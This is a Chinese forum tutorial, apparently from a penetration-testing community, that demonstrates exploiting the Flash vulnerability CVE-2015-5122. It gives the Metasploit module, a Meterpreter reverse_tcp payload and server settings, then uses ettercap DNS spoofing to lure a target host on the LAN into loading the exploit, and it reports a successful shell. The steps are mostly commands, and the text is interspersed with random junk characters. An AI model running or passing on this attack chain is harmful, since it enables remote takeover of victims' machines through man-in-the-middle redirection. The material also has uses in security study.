# Z+ K2 f0 W4 z0 [" y9 S0 C 二、cve2015-5122漏洞实例演示虚拟机 - V" ^8 w( [/ b0 B6 Q: y
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
6 m/ A. h# g1 q7 u/ M search cve-2015-5122如图:
' W; z q4 W6 Y3 M
5 }! e- l" D; N T5 l
. o- w5 g' s1 U" K" r* t) _ 下面我们敲如下命令:
7 }+ Y. [2 a6 Y3 Suse exploit/multi/browser/adobe_flash_opaque_background_uaf
set PAYLOAD windows/meterpreter/reverse_tcp 9 Y6 H' }6 Q. _, l
set LHOST 192.168.0.109 k( _1 D4 {/ D
set URIPATH / /*根目录*/ : F; S4 A1 _% t
# K( O0 e8 C$ ^set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
1 v4 W+ O3 b+ r. q set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 2 g- Y0 r4 B9 @) w7 T. @2 r3 l
然后show options如图:
+ C( O, @7 Y/ e+ F; [9 v4 N
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
+ r @" r6 B2 U" }
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 8 V" o! |1 c w4 s* y/ U7 V
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
1 w4 g) ^* n, A3 V( I6 w/ h( e7 f: H) {# ?3 m& F
) G0 D0 O2 a* L
成功了,这时候我们断开ettercap,如图:
2 C6 g8 L( d9 O' s. D5 g
; ~3 D d4 A1 M& t, |
% l2 v( B/ s/ U, p8 @1 |4 s, [ Screenshot如图:
5 {7 R# O/ u0 V9 U! q& Z
5 \" r1 y' W% \: q. }
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |